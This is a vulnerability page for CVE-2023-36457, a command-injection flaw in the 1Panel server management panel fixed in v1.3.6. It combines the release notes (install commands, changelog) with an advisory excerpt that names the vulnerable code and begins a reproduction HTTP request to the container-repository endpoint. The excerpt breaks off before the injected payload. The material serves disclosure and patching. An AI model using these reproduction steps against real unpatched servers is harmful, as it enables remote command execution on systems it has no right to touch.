Headline
CVE-2023-36457: Release v1.3.6 · 1Panel-dev/1Panel
1Panel is an open source Linux server operation and maintenance management panel. Prior to version 1.3.6, an authenticated attacker can craft a malicious payload to achieve command injection when adding container repositories. The vulnerability has been fixed in v1.3.6.
一、安装和升级****1.1 一键安装
CentOS/RHEL
curl -sSL https://resource.fit2cloud.com/1panel/package/quick_start.sh -o quick_start.sh && sh quick_start.sh
Ubuntu
curl -sSL https://resource.fit2cloud.com/1panel/package/quick_start.sh -o quick_start.sh && sudo bash quick_start.sh
Debian
curl -sSL https://resource.fit2cloud.com/1panel/package/quick_start.sh -o quick_start.sh && bash quick_start.sh
1.2 在线升级
登录 1Panel Web 控制台,在页面右下角点击 【检查更新】 进行在线升级。
更多信息请查阅在线文档:https://1panel.cn/docs/
二、更新日志****2.1 功能优化
- 应用商店列表增加分页显示。 by @zhengkunwang223 in #1447
- SSH 登录日志列表查询逻辑优化。 by @ssongliu in #1435
2.2 问题修复
- 修复了由于 docker 版本低导致应用无法正常操作的问题。 by @zhengkunwang223 in #1446
- 修复了执行备份根目录文件夹计划任务失败的问题。 by @ssongliu in #1444
- 修复了系统数据库文件无法正常读写时系统提示错误的问题。 by @ssongliu in #1438
- 修复了添加镜像仓库和进入容器终端存在命令注入的问题。 by @ssongliu in #1443
- 修复了设置容器镜像加速和私有仓库时由于空行导致 docker 无法正常启用的问题。 by @ssongliu in #1437
Related news
### Impact The authenticated attacker can craft a malicious payload to achieve command injection when adding container repositories. 1. Vulnerability analysis. ``` backend\app\api\v1\image_repo.go#create ```  ``` backend\app\service\image_repo.go#CheckConn ```  2. vulnerability reproduction. ``` POST /api/v1/containers/repo HTTP/1.1 Host: 192.168.109.152:40982 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-CSRF-TOKEN: Content-Length: 446 Origin: http://192.168.109.152:40982 Connection: close Referer: http://192.168.109.152:40982/containers/repo Cookie: rem-username=admin; psession...